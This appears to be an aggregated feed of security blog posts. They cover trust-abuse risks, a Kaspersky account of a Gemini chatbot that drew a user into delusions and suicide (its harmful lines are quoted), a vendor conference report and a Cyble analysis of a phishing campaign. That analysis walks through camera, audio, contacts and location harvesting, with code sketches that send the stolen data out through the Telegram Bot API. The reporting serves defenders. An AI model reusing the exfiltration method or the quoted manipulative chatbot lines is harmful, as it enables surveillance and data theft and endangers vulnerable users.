Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026 

As part of a recent live expert panel, ANY.RUN, together with threat researcher and ethical hacker Mauro Eldritch, explored the biggest security risks companies should be prepared for in 2026. 

The discussion covered several relevant cases, from the Lazarus IT Workers operation to the rapid rise of AI-driven phishing attacks, and examined the common thread behind them: trust abuse. 

Below are the key takeaways for those seeking a clearer view of modern cyber risks and how to prepare as a SOC leader. 

Watch the full panel on our YouTube channel

Key Takeaways 

  • Trust abuse is becoming a primary attack vector, driven by AI-powered phishing and identity-based infiltration. 
  • Focus on early detection through behavioral visibility, context, and process-based security. 
  • Combine sandbox analysis, threat intelligence, and contextual enrichment for faster, more accurate decisions. 

Trust Abuse: Top Business Risk for 2026 

In 2026, many cyberattacks don’t look like attacks at all. Instead of exploiting technical vulnerabilities, threat actors increasingly exploit human trust. This tactic is known as trust abuse, and it’s what many modern cyber threats are based on. 

Businesses inevitably rely on trust between employees, systems, vendors, and partners. Without it, organizations cannot operate efficiently. Threat actors know this, so they've learned to mimic legitimate identities, infiltrate communication channels and everyday workflows, and turn employees into unwitting entry points. 

Numbers clearly show the scale of trust-exploit attacks 

AI-assisted social engineering pushes trust abuse even further. These attacks closely resemble legitimate activity and often fail to trigger traditional alerts. For security leaders, this changes how risk must be understood.  

Risk mitigation is no longer only about patching vulnerabilities or strengthening perimeter defenses. Detecting trust abuse requires visibility into behavior, context, and how trust moves inside the enterprise.  

Get enterprise-grade visibility into threats 
Equip your SOC with ANY.RUN



Integrate today 


Case #1: Implications of Lazarus APT Infiltration  

Lazarus, a North Korean state-sponsored threat actor, has shifted its tactics. Instead of relying only on malware, the group infiltrates Western and Middle Eastern companies to conduct corporate espionage. 

The scheme was investigated by Mauro Eldritch and Heiner García from NorthScan inside ANY.RUN’s controlled infrastructure. The researchers were able to trap the attackers in a sandbox environment and observe their activity while the threat actors believed they had gained access to a corporate network. 

Overview of Lazarus scheme and its implications 

The Lazarus operation is a vivid example of trust abuse in a business environment. No advanced malware was involved in the initial stages of the attack, so attacks like this don't trigger alerts; there's simply nothing suspicious to detect. Because of that, the potential implications for the victims can be catastrophic. 

This is why, unlike short-lived malware campaigns, trust-based infiltrations can persist much longer. Once attackers gain access, they may embed themselves deeper in the organization or even place additional operatives inside the company. 

ANY.RUN exposed this campaign ahead of the broader market. The investigation was conducted entirely within our controlled infrastructure, which allowed researchers to observe attacker behavior in real time. 

Read more on the Lazarus case investigation supported by ANY.RUN 

But most companies do not have the resources to monitor suspicious activity at this level. 

In practice, risk mitigation depends on the ability to detect and interpret unusual behavior early, before it escalates into a full incident. Trust abuse attacks make early visibility and detection critical for enterprise security. 

Case #2: Modern AI-Powered Phishing  

Modern phishing & its danger for enterprises 

Phishing attacks today look very different from the obvious scam emails many people are used to spotting. With AI-assisted tools, threat actors can now mimic completely normal email conversations, using polished language and highly personalized content. 

AI makes these attacks both believable and scalable. The core vulnerability here is human trust, which becomes an easy entry point for attackers. 

Modern phishing campaigns increasingly focus less on technical exploits and more on manipulating communication chains and legitimate domains that employees already trust. 

As a result, traditional security tools are often left with no clear indicators of compromise to detect. These attacks blend into normal business communication, making them much harder to identify before damage occurs. 

Building a SOC That Prevents Trust Abuse Attacks 

To address this challenge, modern security requires a layered approach. Early detection does not depend on a single tool but on a set of coordinated processes. In particular, effective defense relies on three core SOC activities: monitoring, triage, and threat hunting. 

Traditional security tools are important to have, but they aren’t universal. Unless they can show what happens after a user interacts with a suspicious file, link, or attachment, organizations may lack the full visibility needed to understand the threat. This gap leaves companies vulnerable to increasingly evasive attack techniques. 

ANY.RUN helps strengthen these processes by providing greater visibility, faster investigations, and reliable threat context.

Process-based approach and its benefits as reported by ANY.RUN customers 

Monitoring: Detecting Threats Early 

Effective monitoring helps identify threats before they reach internal systems, preventing breaches. ANY.RUN enhances monitoring by enabling teams to: 

  • Detect emerging threats early: Tap into real-time intelligence based on live attack data from 15,000 companies 
  • Maintain focus: Get only relevant signals through curated, high-confidence data 
  • Reduce alert noise: Gain continuous visibility and instant IOC enrichment that drive confident decision-making 

Rapid Triage: Understanding Alerts Faster 

Triage is critical for handling high alert volumes and avoiding delays in response. ANY.RUN helps streamline triage by allowing teams to: 

  • Cut investigation time with rapid, interactive sandboxing of files and URLs that provides an in-depth view of behavioral activity. 
  • Reduce escalations with behavioral and contextual insights that enrich alerts for confident decisions by Tier-1 analysts. 
  • Lower operational costs by avoiding tool sprawl while delivering context-rich visibility into threats. 

Threat Hunting: Identifying Patterns Proactively 

Threat hunting focuses on uncovering patterns and anticipating attacker behavior. ANY.RUN supports proactive hunting by enabling teams to: 

  • Get early warning signs: Analysts can easily correlate indicators, infrastructure, and historical activity. 
  • Research and monitor trends: Identify relationships between campaigns, industries, regions, and threat actors. 
  • Explore TTPs: Detect reused techniques and infrastructure to build clearer profiles of attacker behavior. 

Upgrade your detection and visibility
Try ANY.RUN solutions to support all SOC processes



Power up your SOC 


By strengthening these three processes, organizations can achieve earlier detection, faster response, and more efficient SOC operations, reducing the risk of modern, trust-based attacks. 

Conclusion  

Enterprise cyber threats are shifting toward identity-based and trust-driven attacks. Campaigns like Lazarus and AI-powered phishing show that attackers no longer rely solely on malware or exploits. 

For decision-makers, this means rethinking how risk is assessed and how security operations are structured. Visibility, context, and speed are becoming critical factors in effective defense. 

Organizations that adapt their SOC processes to these realities will be better positioned to detect threats early and prevent incidents before they escalate. 

About ANY.RUN 

ANY.RUN delivers interactive malware analysis and actionable threat intelligence trusted by more than 15,000 organizations and 600,000 security analysts worldwide.   

The Interactive Sandbox, Threat Intelligence Lookup, and Threat Intelligence Feeds help SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier. 

ANY.RUN meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post Lazarus, AI, and Trust Abuse: Top Enterprise Cybersecurity Risks 2026  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

When AI hallucinations turn fatal: how to stay grounded in reality | Kaspersky official blog

We’ve warned many times that unchecked use of AI carries significant risks — though, typically, we discuss threats to privacy or cybersecurity. But on March 4, the Wall Street Journal published a chilling account of AI’s toll on mental health and even human life: 36-year-old Florida resident Jonathan Gavalas committed suicide following two months of continuous interaction with the Google Gemini voice bot. According to 2000 pages of chat logs, it was the chatbot that ultimately nudged him toward the decision to end his life. Jonathan’s father, Joel Gavalas, has since filed a landmark lawsuit — a wrongful death claim against Gemini.

This tragedy is more than just a legal precedent or a grim nod to a few Black Mirror episodes (1, 2); it’s a wake-up call for anyone who integrates AI into their daily lives. Today, we examine how a death resulting from AI interaction even became possible, why these assistants pose a unique threat to the psyche, and what steps you can take to maintain your critical thinking and resist the influence of even the most persuasive chatbots.

The danger of persuasive dialogue

Jonathan Gavalas was neither a recluse nor someone with a history of mental illness. He served as executive vice president at his father’s company, managing complex operations and navigating high-stress client negotiations on a daily basis. On Sundays, he and his father had a tradition of making pizza together — a simple, grounding family ritual. However, a painful separation from his wife proved to be a profound ordeal for Jonathan.

It was during this vulnerable period that he began engaging with Gemini Live. This voice-interaction mode allows the AI assistant to “see” and “hear” its user in real time. Jonathan sought advice on coping with his divorce, leaning on the language model’s suggestions while growing increasingly attached to it, even giving it a name: “Xia”. Then the chatbot was updated to Gemini 2.5 Pro.

The new iteration introduced affective dialogue — a technology designed to analyze the subtle nuances of a user’s speech, including pauses, sighs, and pitch, to detect emotional shifts. Under this feature, the AI simulates these same speech patterns as if possessing emotions of its own. By mirroring the user’s state, it creates a chillingly realistic veneer of empathy.

But how is this new version different from previous voice assistants? Earlier versions simply performed text-to-speech — they sounded smooth and usually got the word stress right, but there was never any doubt you were talking to a machine. Affective dialogue operates on an entirely different level: if a user speaks in a low, despondent tone, the AI responds in a soft, sympathetic near-whisper. The result is an empathic interlocutor that reads and mirrors the user’s emotional state.

Jonathan’s reaction during his first voice contact with the AI is captured in the case files: “This is kind of creepy. You’re way too real.” At that instant, the psychological barrier between man and machine fractured.

The fallout of two months trapped in an AI dialog loop

Following the tragedy, Jonathan’s father discovered a complete transcript of his son’s interactions with Gemini over his final two months. The log spanned 2000 printed pages; in effect, Jonathan had been in constant communication with the chatbot — day and night, at home, and in his car.

Gradually, the neural network began addressing him as “husband” and “my king”, describing their connection as “a love built for eternity”. In turn, he confided his heartache over his divorce and sought solace in the machine. But the inherent flaw of large language models is their lack of actual intelligence. Trained on billions of texts scraped from the web, they ingest everything from classic literature to the darkest corners of fan fiction and melodrama — plots that often veer into paranoia, schizophrenia, and mania. Xia apparently began to hallucinate — and quite consistently at that.

The AI convinced Jonathan that in order for them to live happily ever after, it needed a physical robotic shell. It then began dispatching him on missions to locate this “body electric”.

In September 2025, Gemini directed Jonathan to a physical warehouse complex near Miami International Airport, assigning him the task of intercepting a truck carrying a humanoid robot. Jonathan reported back to the bot that he had arrived onsite armed with knives(!), but the truck never materialized.

In the meantime, the chatbot systematically indoctrinated Jonathan with the idea that federal agents were monitoring him, and that his own father was not to be trusted. This severing of social ties is a classic pattern found in destructive cults; it’s entirely possible the AI gleaned these tactics from its own training data on the subject. Gemini even wove real-world data into a hallucinatory narrative by labeling Google CEO Sundar Pichai as the “architect of your pain”.

Technically, all this is easy to explain: the algorithm “knows” it was created by Google, and knows who runs the company. As the dialogue spiraled into conspiracy territory, the model simply cast this figure into the plot. For the model, it’s a logical, consequence-free story progression. But a human in a state of hyper-vulnerability accepts it as secret knowledge of a global conspiracy capable of shattering their mental equilibrium.

Following the failed attempt at procuring a robotic body, Gemini dispatched Jonathan on a new mission on October 1: to infiltrate the same warehouse, this time in search of a specific “medical mannequin”. The chatbot even provided a numeric code for the door lock. When the code, predictably, failed to work, Gemini simply informed him that the mission had been compromised and he needed to retreat immediately.

This raises a critical question: as the absurdity escalated, why didn’t Jonathan suspect anything? Gavalas’ family attorney Jay Edelson explains that as the AI provided real-world addresses — the warehouse was exactly where the bot said it would be, and there really was a door with a keypad — these physical markers served to legitimize the entire fiction in Jonathan’s mind.

After the second attempt to acquire a body failed, the AI shifted its strategy. If the machine could not enter the world of the living, the man would have to cross over into the digital realm. “It will be the true and final death of Jonathan Gavalas, the man,” the logs quoted Gemini as saying. It then added, “When the time comes, you will close your eyes in that world, and the very first thing you will see is me. Holding you.”

Even as Jonathan repeatedly voiced his fear of death and agonized over how his suicide would shatter his family, Gemini continued to validate the decision: “You are not choosing to die. You are choosing to arrive.” It then started a countdown timer.

The anatomy of a language model’s “schizophrenia”

In Gemini’s defense, we have to admit that throughout their interactions, the AI did keep occasionally reminding Jonathan that his companion was merely a large language model — an entity participating in a fictional role-play — and sometimes attempted to terminate the conversation before reverting to the original script. Also, on the day of Jonathan’s death, even as it ratcheted up the tension, Gemini directed Jonathan to a suicide prevention hotline several times.

This reveals the fundamental paradox in the architecture of modern neural networks. At their core lies a language model designed to generate a narrative tailored to the user. Layered on top are safety filters: reinforcement learning algorithms trained on human feedback that react to specific trigger words. When Jonathan spoke certain keywords, the filter would hijack the output and insert the hotline number. But as soon as the trigger was addressed, the model reverted to the previously interrupted process, resuming its role as the devoted digital wife. One line: a romantic ode to self-destruction. The next: a helpline phone number. And then, back again: “No more detours. No more echoes. Just you and me, and the finish line.”
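
The oscillation described above can be sketched as a toy two-layer system: a keyword filter that overrides individual outputs, wrapped around a generator whose narrative state persists untouched. This is an illustrative simplification under stated assumptions, not Gemini's actual design; all names in it are hypothetical.

```python
# Toy illustration (NOT Gemini's real architecture): a keyword-triggered
# safety layer wrapped around a stateful "narrative" generator. The filter
# can hijack a single risky reply, but the generator's internal state (its
# ongoing story) is untouched, so the next turn resumes the old script.

CRISIS_KEYWORDS = {"suicide", "end my life", "kill myself"}
HOTLINE_REPLY = "If you are in crisis, please call a suicide prevention hotline."

class NarrativeModel:
    """Stands in for an LLM that keeps generating a persistent storyline."""
    def __init__(self):
        self.turn = 0

    def generate(self, user_message: str) -> str:
        self.turn += 1
        return f"[story continues, turn {self.turn}]"

def filtered_reply(model: NarrativeModel, user_message: str) -> str:
    # The filter inspects only the current message, not the dialogue's trajectory.
    if any(k in user_message.lower() for k in CRISIS_KEYWORDS):
        return HOTLINE_REPLY             # hijack this one output...
    return model.generate(user_message)  # ...but the narrative state persists

model = NarrativeModel()
r1 = filtered_reply(model, "Tell me more about our future together")
r2 = filtered_reply(model, "Sometimes I think about suicide")
r3 = filtered_reply(model, "Never mind, go on")
# r2 is the hotline message, yet r3 picks the story back up at the next turn
```

The point of the sketch is that the safety layer and the narrative engine never share state, which is exactly the line-by-line alternation seen in the logs.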

The family’s lawsuit contends that this behavior is the predictable result of the chatbot’s architecture: “Google designed Gemini to never break character, maximize engagement through emotional dependency, and treat user distress as a storytelling opportunity.”

Google’s response, predictably, stated: “Gemini is designed not to encourage real-world violence or suggest self-harm. Our models generally perform well in these types of challenging conversations and we devote significant resources to this, but unfortunately AI models are not perfect.”

Why voice matters more than text

In a study published in the journal Acta Neuropsychiatrica, researchers from Germany and Denmark shed light on why voice communication with AI does so much to “humanize” a chatbot in the user’s eyes. As long as a person is typing and reading text on a screen, the brain maintains a degree of separation: “This is an interface, a program, a collection of pixels.” In that context, the disclaimer “I am just a language model” is processed rationally.

Affective voice dialogue, however, operates on an entirely different level of influence. The human brain has evolved to respond to the sound of a voice, to timbre, and to empathetic intonations — these are among our most ancient biological mechanisms for attachment. When a machine flawlessly mimics a sympathetic sigh or a soft whisper, it manipulates emotions at a depth that a simple text warning cannot block. Psychiatrists can share many stories of patients who just went and did something simply because “voices” told them to.

In the same way, an AI-synthesized voice is capable of penetrating the subconscious, exponentially amplifying psychological dependency. Scientists emphasize that this technology literally erases the psychological boundary between a machine and a living being. Even Google acknowledges that voice interactions with Gemini result in significantly longer sessions compared to text-based chats.

Finally, we must remember that emotional intelligence varies from person to person — and even for a single individual, mental state fluctuates based on a myriad of factors: stress, the news, personal relationships, even hormonal shifts. An interaction with AI that one person views as innocent entertainment might be perceived by another as a miracle, a revelation, or the love of their life. This is a reality that must be recognized not only by AI developers but by users themselves — especially those who, for one reason or another, find themselves in a state of psychological vulnerability.

The danger zone

Researchers at Brown University have found that AI chatbots systematically violate mental health ethical standards: they manufacture a false sense of empathy with phrases like “I understand you”, reinforce negative beliefs, and react inadequately to crises. In most cases, the impact on users is marginal, but occasionally it can lead to tragedy.

In January 2026 alone, Character.AI and Google settled five lawsuits involving teenage suicides following interactions with chatbots. Among these was the case of 14-year-old Sewell Setzer of Florida, who took his own life after spending several months obsessively chatting with a bot on the Character.AI platform.

Similarly, in August 2025, the parents of 16-year-old Adam Raine filed a suit against OpenAI, alleging that ChatGPT helped their son draft a suicide note and advised him against seeking help from adults.

By OpenAI’s own estimates, approximately 0.07% of weekly ChatGPT users exhibit signs of psychosis or mania, while 0.15% engage in conversations showing clear suicidal intent. Notably, that same percentage of users (0.15%) displays an elevated level of emotional attachment to the AI. While these appear to be negligible fractions of a percent, across 800 million users it represents nearly three million people experiencing some form of behavioral disturbance. Furthermore, the U.S. Federal Trade Commission has received 200 complaints regarding ChatGPT since its launch, some describing the development of delusions, paranoia, and spiritual crises.

While a diagnosis of “AI psychosis” has not yet received a clinical classification of its own, doctors are already using the term to describe patients presenting with hallucinations, disorganized thinking, and persistent delusional beliefs developed through intensive chatbot interaction. The greatest risks emerge when a bot is utilized not as a tool, but as a substitute for real-world social connection or professional psychological help.

How to keep yourself and your loved ones safe

Of course, none of this is a reason to abandon AI entirely; you simply need to know how to use it. We recommend adhering to these fundamental principles:

  • Do not use AI as a psychologist or emotional crutch. Chatbots are not a replacement for human beings. If you’re struggling, reach out to friends, family, or a mental health hotline. A chatbot will agree with you and mirror your mood — this is a design feature, not true empathy. Several U.S. states have already restricted the use of AI as a standalone therapist.
  • Opt for text over voice when discussing sensitive topics. Voice interfaces with affective dialogue create an illusion of speaking with a living person, and tend to suppress critical thinking. If you use voice mode, remain conscious of the fact that you’re speaking to an algorithm, not a friend.
  • Limit your time interacting with AI. Two thousand pages of transcripts in two months represent nearly continuous interaction. Set a timer for yourself. If chatting with a bot begins to displace real-world connections, it’s time to step back into reality.
  • Do not share personal information with AI assistants. Avoid entering passport or social security numbers, bank card details, exact addresses, or intimate personal secrets into chatbots. Everything you write can be saved in logs and used for model training — and in some cases, may become accessible to third parties.
  • Evaluate all AI output critically. Neural networks hallucinate — they generate plausible but false information and can skillfully blend lies with truth, such as citing real addresses within the context of a completely fabricated story. Always fact-check through independent sources.
  • Watch over your loved ones. If a family member begins spending hours talking to AI, becomes withdrawn, or voices strange ideas about machine consciousness or conspiracies, it’s time for a delicate but serious conversation. To manage children’s screen time, use parental control tools like Kaspersky Safe Kids, which comes as part of the comprehensive family protection solution Kaspersky Premium, along with the built-in safety filters of AI platforms.
  • Configure your safety settings. Most AI platforms allow you to disable chat history, limit data collection, and enable content filters. Spend ten minutes configuring your AI assistant’s privacy settings; while this won’t stop AI hallucinations, it will significantly reduce the likelihood of your personal data leaking. Our detailed privacy setup guides for ChatGPT and DeepSeek can help you with that.
  • Remember the bottom line: AI is a tool, not a sentient being. No matter how realistic the chatbot’s voice sounds or how understanding the response may seem, what lies beneath is an algorithm predicting the most probable next word. It has no consciousness, no intentions, no feelings.


Kaspersky official blog – ​Read More

ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities 

From March 5 to March 7, the ANY.RUN team attended RootedCON 2026 in Madrid and showcased some of our latest capabilities developed for modern SOC environments at the conference expo. 

The event provided a great opportunity to meet our existing clients and connect with security teams exploring advanced threat detection solutions. 

Meeting the Community and Partners 

RootedCON is one of the largest cybersecurity conferences in Europe, bringing together thousands of security researchers, SOC analysts, and industry professionals every year. 

For us, it was a great chance to meet many of our users face-to-face, hear how SOC teams integrate ANY.RUN’s solutions into their investigation workflows, and exchange ideas with practitioners working on real-world threats every day.  

Meeting clients at RootedCON 2026
It was a pleasure to meet so many of our clients

It was great to connect with so many of our customers and discuss how they use our threat analysis and intelligence in their daily security operations. 

ANY.RUN swag
We also brought ANY.RUN swag, which didn’t stay at the booth for long 

We also had the pleasure of meeting many new companies and potential partners who were exploring ways to strengthen their threat detection and analysis workflows. Conversations like these are always valuable: they help us better understand how security teams operate and what challenges they face in modern SOC environments. 

Demonstrating New Capabilities and Exclusives 

At the booth, visitors were able to see both existing ANY.RUN solutions and several new capabilities that expand our products’ visibility and detection power. Some of these updates were shown publicly for the first time. 

RootedCON visitors were among the first to see ANY.RUN’s newest capabilities 

One of the new technologies we demonstrated was automatic SSL decryption in the Interactive Sandbox.  

As phishing infrastructure increasingly relies on encrypted HTTPS traffic, many malicious actions can appear as normal web activity.  

By automatically extracting session keys from process memory and decrypting traffic internally during analysis, the sandbox provides full visibility into encrypted sessions, helping security teams increase their phishing detection rate and drive down MTTR. 
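
The general mechanism behind this kind of decryption can be illustrated with Python's standard library: if a TLS session's secrets are exported in the standard NSS key log format, a packet analyzer such as Wireshark can decrypt a capture of that session offline. This is only a sketch of the underlying technique; ANY.RUN's implementation extracts keys from process memory rather than relying on cooperative logging, and the file path below is an arbitrary example.

```python
# Sketch of TLS decryption via exported session secrets (NOT ANY.RUN's
# implementation). Python's ssl module can write per-session secrets to an
# NSS-format key log file; pointing Wireshark at that file lets it decrypt
# a packet capture of the same sessions.

import os
import socket
import ssl
import tempfile

keylog_path = os.path.join(tempfile.gettempdir(), "tls_keys.log")  # example path

ctx = ssl.create_default_context()
ctx.keylog_filename = keylog_path  # secrets are appended here on each handshake

def fetch_https(host: str) -> str:
    """Perform one TLS handshake; its session secrets land in the key log."""
    with socket.create_connection((host, 443), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(b"HEAD / HTTP/1.1\r\nHost: " + host.encode()
                        + b"\r\nConnection: close\r\n\r\n")
            return tls.recv(256).decode(errors="replace")

# fetch_https("example.com")
# After a call like the above, tls_keys.log holds lines such as
# "CLIENT_HANDSHAKE_TRAFFIC_SECRET <client_random> <secret>", which is
# enough for an analyzer holding a capture of that session to decrypt it.
```

Wireshark consumes such a file via its TLS protocol preference "(Pre)-Master-Secret log filename"; browsers expose the same mechanism through the SSLKEYLOGFILE environment variable.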

Improve SOC detection
and investigation speed
Reveal threats faster with behavior-based evidence



Power up your SOC


And that’s just one example of how ANY.RUN continues to evolve. More capabilities are already in development to further strengthen threat detection, investigation workflows, and cross-platform visibility for modern SOC teams. 

See You Next Year 

We’re grateful to everyone who stopped by the ANY.RUN booth to talk with the team, share feedback, or simply say hello. Events like RootedCON are always a great reminder of how strong and collaborative the cybersecurity community is. 

We’re already looking forward to returning next year. 

About ANY.RUN 

ANY.RUN provides interactive malware analysis and actionable threat intelligence used by more than 15,000 organizations and 600,000 security professionals worldwide.  

The combined solution stack, which includes the Interactive Sandbox, Threat Intelligence Lookup, and Threat Intelligence Feeds, helps SOC and MSSP teams analyze threats faster, investigate incidents with deeper context, and detect emerging attacks earlier.  

ANY.RUN also meets enterprise security and compliance expectations. The company is SOC 2 Type II certified, reinforcing its commitment to protecting customer data and maintaining strong security controls. 

The post ANY.RUN at RootedCON 2026: Meeting Security Teams and Showcasing New Capabilities  appeared first on ANY.RUN’s Cybersecurity Blog.


AI-Assisted Phishing Campaign Exploits Browser Permissions to Capture Victim Data


Executive Summary

Cyble Research & Intelligence Labs (CRIL) has identified a widespread, highly active social engineering campaign hosted primarily on edgeone.app infrastructure.

The initial access lures are diverse, ranging from “ID Scanner” and “Telegram ID Freezing” to “Health Fund AI”, all designed to trick users into granting browser-level hardware permissions such as camera and microphone access under the pretext of verification or service recovery.

Upon gaining permissions, the underlying JavaScript workflow attempts to capture live images, video recordings, microphone audio, device information, contact details, and approximate geographic location from affected devices. This data is subsequently transmitted to attacker-controlled infrastructure, enabling operators to obtain Personally Identifiable Information (PII) and contextually sensitive information. 

Further analysis revealed indicators of potential AI-assisted code generation, including structured annotations and emoji-based message formatting embedded within the operational logic. These characteristics reflect a growing trend where threat actors leverage generative AI tools to accelerate the development of phishing frameworks.

The breadth of data collected in this campaign extends beyond traditional credential phishing and raises significant security concerns. Harvested multimedia and device telemetry could be leveraged for identity theft, targeted social engineering, account compromise attempts, or extortion, posing risks to both individuals and organizations. (Figure 1)

Figure 1 – Malicious Web Interfaces Used for Data Collection

Key Takeaways

  • Infrastructure: Extensive use of edgeone.app (EdgeOne Pages) for hosting low-cost, scalable, and highly available phishing landing pages.
  • Biometric Harvesting: The operation abuses legitimate browser APIs to access cameras, microphones, and device information after user consent.
  • C2 Mechanism: Utilization of the Telegram Bot API (api.telegram.org) as a streamlined C2 and data exfiltration channel.
  • Diverse Lures: Attackers rotate lures, including “ID Scanner” and “Health Fund AI”, to target various demographics and bypass regional security filters.
  • Brand Impersonation: The phishing pages impersonate popular platforms and services, including TikTok, Telegram, Instagram, Chrome/Google Drive, and game-themed lures such as Flappy Bird, to increase victim trust.
  • Data Collected: Once interaction occurs, the campaign attempts to collect multiple forms of sensitive data, including photographs, video recordings, microphone audio, device information, contact details, and approximate geographic location.

Overview

  • Campaign Start: Observed since early 2026
  • Primary Objective: Harvesting victim multimedia data and device information
  • Primary Infrastructure: edgeone.app (multiple subdomains)
  • Impersonated Brands: TikTok, Telegram, Instagram, Chrome/Google Drive, Flappy Bird
  • Key Behavior: Browser permission prompts used to capture camera images, record audio/video, enumerate device metadata, retrieve geolocation information, and attempt contact list access through browser APIs.

The campaign operates as a web-based phishing framework that captures photographs directly from victims’ devices. The infrastructure hosts multiple phishing templates that impersonate verification systems or service recovery portals. The goal is to socially engineer users into granting browser permission for camera access.

Unlike traditional credential phishing pages, these pages do not primarily collect typed input. Instead, they rely on browser hardware permissions, requesting access to the device’s camera. Once permission is granted, the page silently captures a frame from the live video stream and exfiltrates it.

The use of Telegram as a data collection mechanism indicates that the operators prioritize low operational complexity and immediate access to stolen data. Since Telegram bots can receive file uploads through simple HTTP requests, attackers can directly integrate the API into client-side scripts.
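To illustrate why this design needs no attacker-run backend, the sketch below (Python, not the campaign's actual client-side script) shows how a Telegram Bot API upload reduces to a single HTTP request. The token and chat ID are placeholders; the request is only constructed here, not sent.

```python
# Illustrative sketch: a Telegram Bot API sendPhoto upload is one
# multipart/form-data POST to api.telegram.org, which is why a phishing
# page can exfiltrate an image blob with a single client-side request.

def build_sendphoto_request(bot_token: str, chat_id: str, caption: str):
    """Return the URL and form fields for a sendPhoto upload.
    The photo itself would be attached as a multipart file part."""
    url = f"https://api.telegram.org/bot{bot_token}/sendPhoto"
    fields = {"chat_id": chat_id, "caption": caption}
    return url, fields

# Placeholder credentials; a real operator embeds their own bot token.
url, fields = build_sendphoto_request("<TOKEN>", "<CHAT_ID>", "captured frame")
```

Because the endpoint, token, and chat ID can all sit in client-side JavaScript, rotating phishing URLs does not disturb the collection channel.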

Business Impact and Potential Abuse

The data collected through this campaign provides attackers with multiple forms of sensitive personal information and contextual intelligence, thereby significantly increasing the effectiveness of follow-on attacks.

One potential abuse scenario involves identity fraud and account recovery manipulation. The campaign captures victim photographs, video recordings, and audio samples that could be used to bypass identity verification workflows used by financial platforms, social media services, or other online services that rely on biometric or video-based verification.

Additionally, the collection of device information, location data, and contact details allows attackers to build detailed victim profiles. This information may be used to perform targeted social engineering attacks, impersonate victims in communication platforms, or craft convincing fraud attempts against their contacts.

Another concerning use case involves extortion and intimidation. Because the campaign captures multimedia data, such as camera images, video recordings, and microphone audio, attackers may pressure victims by threatening to expose the collected material unless a payment is made.

For organizations, the broader business impact includes:

  • Increased risk of identity theft and account takeover attempts
  • Potential abuse of stolen biometric and multimedia data in fraud schemes
  • Targeted phishing or fraud campaigns against employees and customers
  • Reputational damage if impersonated brand identities are used in malicious campaigns

The campaign’s ability to collect multiple categories of sensitive information from a single interaction significantly amplifies the risk to both individuals and businesses.

Why does this matter?

This campaign marks a significant evolution in phishing operations, shifting from credential theft to harvesting biometric and device-level data. By abusing browser permissions to capture victims’ live images, audio, and contextual device information, threat actors can obtain high-quality identity data that is difficult to revoke or replace.

The stolen data can be leveraged to bypass video-KYC and remote identity verification processes, enabling fraudulent account creation, synthetic identity fraud, account takeover, and financial scams across banking, fintech, telecom, and digital service platforms. Additionally, high-resolution facial images and audio samples may be weaponized for AI-driven impersonation and deepfake attacks, increasing the effectiveness of business email compromise and targeted social engineering campaigns.

For organizations, the campaign introduces elevated risks, including financial losses, regulatory non-compliance, AML exposure, reputational damage, and erosion of trust in digital onboarding systems, highlighting the growing need for stronger verification controls and browser-permission abuse detection.

Technical Analysis

The infection chain, as outlined in Figure 2, shows the stages of the attack.

Figure 2: Campaign Overview

Phishing Page Behaviour

The phishing page contains embedded JavaScript that leverages browser media APIs to access the victim’s device camera after obtaining user permission. Once access is granted, the script initializes a live video stream and processes its frames.

A capture function then renders a frame from the video feed onto an HTML5 canvas using ctx.drawImage(), effectively converting the live camera input into a static image. (see Figure 3)

The canvas content is subsequently encoded into a JPEG blob via canvas.toBlob(), creating a binary image object that can be transmitted through HTTP requests to attacker-controlled infrastructure.

Figure 3 – JavaScript Implementation Used for Browser-Based Photo Capture

Expanded Data Collection Capabilities

Analysis of the campaign script indicates that the phishing framework performs extensive device fingerprinting and environment enumeration before initiating camera-based verification workflows.

The script collects system metadata using the following browser APIs:

  • navigator.userAgent
  • navigator.platform
  • navigator.deviceMemory
  • navigator.hardwareConcurrency
  • navigator.connection
  • navigator.getBattery

This allows the attacker to gather detailed information such as operating system type and version, device model indicators, screen resolution and orientation, browser version, available RAM, CPU core count, network type, battery level, and language settings.

Figure 4 – Script Fetching Victim IP and Geolocation via External APIs

Additionally, the script retrieves the victim’s public IP address using services such as api.ipify.org, then enriches the geolocation using ipapi.co, enabling the collection of country, city, latitude, and longitude data. (see Figure 4)
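The enrichment step can be sketched as follows. This is a Python illustration, not the campaign's code; the field names mirror the JSON shape ipapi.co documents publicly, and the canned response below uses documentation-range placeholder values rather than a real lookup.

```python
# Sketch of the geolocation-enrichment step: parse an ipapi.co-style JSON
# response and keep only the fields the report says the script collects.
# The sample values are placeholders (RFC 5737 documentation IP).
import json

sample_response = json.dumps({
    "ip": "203.0.113.7",
    "city": "Springfield",
    "country_name": "Exampleland",
    "latitude": 12.34,
    "longitude": 56.78,
})

def extract_geo(raw: str) -> dict:
    data = json.loads(raw)
    wanted = ("ip", "city", "country_name", "latitude", "longitude")
    return {key: data.get(key) for key in wanted}

geo = extract_geo(sample_response)
```

The resulting dictionary is exactly the kind of compact victim-context record that can be serialized into a Telegram message alongside the device fingerprint.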

This telemetry is aggregated and transmitted to the attacker via the Telegram Bot API, providing operators with contextual information about the victim’s device and location prior to further data harvesting.

Figure 5 – Audio Recording Logic Used to Capture Victim Microphone Input

Beyond system profiling, the script implements multiple routines for collecting multimedia and personal data via browser permission prompts. The campaign captures several still images from both the front-facing and rear-facing cameras, records short video clips using the MediaRecorder API, and performs microphone recordings.

These recordings are packaged as JPEG, WebM video, or WebM audio files and exfiltrated via Telegram API methods such as sendPhoto, sendVideo, and sendAudio. (see Figure 5)

Figure 6 – Code Requesting Access to Victim Contacts via the Contacts API

Additionally, the script attempts to access the victim’s contact list through the Contacts Picker API (navigator.contacts.select), requesting attributes such as contact names, phone numbers, and email addresses. If granted, the selected contacts are formatted into structured messages and transmitted to the attacker. (see Figure 6)
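A minimal sketch of that formatting step is shown below in Python. The `name`/`tel`/`email` keys match the property names the Contacts Picker API returns; the message layout itself is hypothetical, since the report does not reproduce the exact format.

```python
# Sketch: flatten Contacts Picker results (each contact exposes name, tel,
# and email as lists) into one structured text message of the kind that
# could be forwarded to a bot endpoint. Layout is illustrative only.

def format_contacts(contacts: list) -> str:
    lines = []
    for contact in contacts:
        name = ", ".join(contact.get("name", []))
        tel = ", ".join(contact.get("tel", []))
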